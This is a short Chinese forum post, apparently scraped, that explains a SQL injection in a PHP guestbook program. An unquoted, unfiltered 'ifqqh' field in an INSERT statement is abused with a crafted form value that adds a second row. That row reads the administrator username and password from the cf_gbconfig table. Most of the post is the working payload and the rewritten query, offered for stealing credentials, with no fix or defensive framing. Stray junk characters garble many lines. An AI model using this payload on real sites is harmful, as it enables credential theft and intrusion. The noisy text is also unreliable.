留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。" }4 I5 t0 P2 p8 G* y/ w2 r
" x% e& x$ a9 o& C
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。 l- F; G+ V# a6 b$ n% c
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
- p% i, E/ J# O& G& Q7 P% s$ B5 T( t7 K- f5 }: h$ {7 D% T$ J
提交的时候把ifqqh的值改一下。变成
* h! M5 b$ F3 L5 y' ?1 b' y
' W; S; O7 z% m' K<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />/ X+ F* }0 E' z4 t) N
; l- q% |4 C& j
这样SQL插入语句就变了.
0 t3 f/ D2 @2 \) l# f- Y2 C2 u# g3 [
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0); W A8 Y: q0 d7 C0 B( o8 X
% z7 ^+ d) R! l9 T: b% W
构造了另外一句SQL。并且把帐号密码读出来。
6 F- K9 s5 _+ t4 J% J# @6 B6 _1 ?% ]
|